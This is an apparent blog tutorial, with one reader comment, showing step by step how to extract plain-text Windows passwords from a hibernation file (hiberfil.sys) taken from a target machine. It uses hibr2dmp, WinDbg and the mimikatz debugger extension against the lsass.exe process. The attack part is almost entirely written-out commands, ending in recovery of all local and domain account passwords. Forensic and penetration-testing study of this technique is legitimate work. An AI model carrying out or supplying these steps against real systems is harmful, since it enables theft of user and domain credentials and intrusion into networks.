Mimikatz, a tool that allows to extract Windows credentials as plain text from LSA, is available since 2012. However, besides a well-covered feature of recovering passwords from the memory of a running OS, it has another interesting capability. Further a step-by-step instructions are given, how to easily extract the Windows users credentials data from hiberfil.sys file.
Preparation
To follow these instructions we’ll need the following tools:
- Debugging Tools for Windows (WinDbg)
- Windows Memory toolkit free edition
- And mimikatz itself
Instructions
- Get hiberfil.sys from the target machine.
- Convert it into a format WinDbg can work with: hibr2dmp.exe
d:\temp\hiberfil.sys c:\temp\hiberfil.dmpIt can take some time (in our example, it took about 14 hours).
- Run WinDbg and open the file you got in the previous step.File -> Open Crash Dump
- Set the debug symbols.Open File -> Symbol File Path… and enter the next line:
SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
You can specify any other directory to which the symbols are to be downloaded instead of c:\symbols
Type the following in the debugger command prompt:
0: kd> .reload /n
Wait till the symbol download is completed:
- Specify the path to mimilib.dll. (It is located in the same directory as mimikatz.)
0: kd> .load z:\Sft\Security\Password\Mimikatz\x64\mimilib.dll
- Find the address of lsass.exe.
0: kd> !process 0 0 lsass.exee
In our case the address is as follows: fffffa800a7d9060.
- Switch the process context.
0: kd> .process /r /p fffffa800a7d9060
- Run mimikatz and obtain plaint text passwords.
0:kd> !mimikatz
This way you can extract from the hibernation file passwords of all local and domain accounts, registered in the system.
1 comment
We’ve analyzed the hiberfil.sys file format of Windows 8, and will release a Decompressor a month later. Anybody who want to joint us or want to own the Decompressor may mail to us, flyingdreaming@bupt.edu.cn.